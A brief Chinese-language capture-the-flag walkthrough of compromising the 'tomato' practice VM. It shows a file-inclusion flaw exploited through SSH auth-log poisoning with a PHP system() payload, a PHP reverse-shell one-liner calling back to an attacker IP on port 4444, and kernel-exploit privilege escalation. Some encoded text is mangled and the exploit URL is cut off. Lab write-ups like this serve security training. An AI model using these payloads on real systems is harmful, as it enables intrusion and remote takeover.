tomato靶机提权

靶机提权"/>

tomato靶机提权

tomato靶机提权

• 信息收集
• 利用漏洞
• 权限提升

信息收集

1、 使用arp-scan -l 扫描本地局域网存活主机：

2、 Nmap扫描开放端口以及相关信息：

3、 访问http服务端口查看页面信息：

4、 没有相关可利用信息，继续访问8888端口http服务：

5、 利用dirb对站点目录进行爆破：

6、 发现其他站点并进行访问

7、 根据修改时间发现info.php文件最新更新，访问并查看源码：

发现文件包含，尝试包含文件…/…/…/…/…/…/etc/passwd:

利用漏洞

已知info.php文件存在文件包含漏洞，以及开放ssh端口，尝试包含ssh认证日志文件/var/log/auth.log，并利用ssh认证用户名实现命令注入：
1、 尝试用tomato作为用户名进行失败登录，观察相关日志记录：

2、 利用<?php system($_GET[‘cmd’]);?>作为用户名进行php代码注入：

3、 验证php是否注入成功
访问?image=…/…/…/…/…/…/var/log/auth.log&cmd=ls并查看网页源代码：

4、 尝试get shall，利用php反弹shell，kali攻击机利用nc监听4444端口：

PHP反弹shell代码如下：
php -r ‘$sock=fsockopen(“192.168.1.53”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
进行url编码后得到：
php±r+%27%24sock%3dfsockopen(%22192.168.1. 53%22%2c4444)%3bexec(%22%2fbin%2fsh±i+%3c%263+%3e%263+2%3e%263%22)%3b%27

权限提升

1、 利用python打开终端查看内核版本

2、 下载对应版本的exp

git clone .git
然后运行compile.sh 编译c文件

3、 上传至目标主机
python -m SimpleHTTPServer 8000

上传文件至目标机

上传成功

提权成功